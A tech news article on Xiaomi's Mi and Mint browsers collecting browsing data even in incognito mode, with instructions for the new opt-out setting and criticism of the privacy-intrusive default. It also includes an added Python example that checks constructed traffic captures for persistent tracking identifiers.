
How to prevent Xiaomi Phones from Spying On your Incognito Activities



If you own a Xiaomi smartphone or have installed the Mi Browser app on an Android device from another brand, you should enable a newly introduced privacy setting immediately to prevent the company from spying on your online activities.

The smartphone maker has begun rolling out an update to its Mi Browser/Mi Browser Pro (v12.1.4) and Mint Browser (v3.4.3) after concerns were raised over its practice of transmitting web browsing histories and device metadata to the company servers.

The new privacy setting now allows Mi Browser users to disable the aggregated data collection feature while in Incognito Mode, but it bears noting that it's not enabled by default.

The option can be accessed by tapping the settings icon in the browser > Incognito mode settings, and then disabling 'Enhanced incognito mode,' as shown in the screenshot below.

Mint Browser and Mi Browser Pro have been downloaded more than 15 million times from Google Play to date.


The development comes on the heels of a Forbes report last week that detailed how the company's browsers record users' website visits — even in incognito mode.

The browsers, which come pre-installed on millions of Xiaomi devices, capture search engine queries on Google and DuckDuckGo, and also amass data about what folders users open and to which screens they swipe, including the status bar and the settings menu.

[Screenshot: Xiaomi browser privacy settings]

The aggregated data is then transferred to servers located in China and Russia, including servers the company rented from another Chinese tech giant, Alibaba, ostensibly to better understand its users' behavior.

"My main concern for privacy is that the data sent to their servers can be very easily correlated with a specific user," Gabi Cirlig told Forbes.

[Image: Xiaomi browser history]

In response to the report, Xiaomi claimed there were "several inaccuracies and misinterpretations about our process for browser data collection and storage," and that it does not collect any data without permission from the user. It added all data is "aggregated and cannot alone be used to identify any individual."

Cybersecurity researcher Andrew Tierney, who investigated the data sniffing alongside Cirlig, refuted Xiaomi's response over the weekend, stating "they attach UUID to my requests which persists over at least 24 hours," and that "this is close enough to an 'individual.'"
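One way to check a traffic capture for the kind of persistent identifier Tierney describes, as an added example that is not from the original article or from the researchers' tooling. The host, the parameter names (`uid`, `rid`) and all values are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qsl

UUID_RE = re.compile(
    r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$", re.I)

# Constructed sample of proxy-captured requests. The host, parameter names
# and values are hypothetical; none of them come from real Xiaomi traffic.
UID = "3f2b8c1e-7a44-4d0e-9b1a-5c6d7e8f9a0b"
BASE = "https://telemetry.example.invalid/track?uid=" + UID
CAPTURED = [
    ("2020-05-01T09:00:00",
     BASE + "&rid=11111111-1111-4111-8111-111111111111&url=https%3A%2F%2Fnews.example%2Fa"),
    ("2020-05-01T21:30:00",
     BASE + "&rid=22222222-2222-4222-8222-222222222222&q=private+search"),
    ("2020-05-02T10:15:00",
     BASE + "&rid=33333333-3333-4333-8333-333333333333&url=https%3A%2F%2Fhealth.example%2Fclinic"),
]

def persistent_identifiers(records, min_span=timedelta(hours=24)):
    """Find UUID-shaped query values reused on one host for >= min_span."""
    seen = defaultdict(list)  # (host, param, value) -> [(time, other params)]
    for stamp, url in records:
        parts = urlsplit(url)
        params = parse_qsl(parts.query)
        for name, value in params:
            if UUID_RE.match(value):
                others = {k: v for k, v in params if not UUID_RE.match(v)}
                seen[(parts.hostname, name, value.lower())].append(
                    (datetime.fromisoformat(stamp), others))
    findings = {}
    for key, hits in seen.items():
        hits.sort(key=lambda h: h[0])
        span = hits[-1][0] - hits[0][0]
        # A per-request ID appears once; a device/user ID keeps recurring.
        if len(hits) > 1 and span >= min_span:
            findings[key] = {"requests": len(hits), "span": span,
                             "linked": [o for _, o in hits]}
    return findings

if __name__ == "__main__":
    for (host, param, value), f in persistent_identifiers(CAPTURED).items():
        print(f"{host} {param}={value}: {f['requests']} requests over {f['span']}")
        for other in f["linked"]:
            print("   linked activity:", other)
```

The `linked` list is the privacy problem in miniature: every page visit and search query that travelled with the same identifier can be joined into one profile, whether or not a name is attached.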

To Opt-In or Opt-Out?


In pushing the update, the company doesn't seem to be stopping the practice altogether. In other words, unless users explicitly opt-out, Xiaomi will still continue to collect aggregate statistics while in incognito mode.

Note that the company continues to collect the same activity data when browsing in normal (non-incognito) mode, and there's no proper way to disable it.

"We believe this functionality, in combination with our approach of maintaining aggregated data in a non-identifiable form, goes beyond any legal requirements and demonstrates our company's commitment to user privacy," Xiaomi said in an update.

The fact that this data collection will remain enabled in the incognito mode is yet another example of a dark pattern that pushes for a privacy-intrusive default setting.

What's more, selecting the privacy-friendly choice takes at least three steps, proving once again that privacy comes at a cost, and it's always opt-out and never opt-in.

If Xiaomi were serious about its "commitment to user privacy," it would have sought users' explicit consent. In its present state, it's just an illusion of control.
Source: The Hacker News 
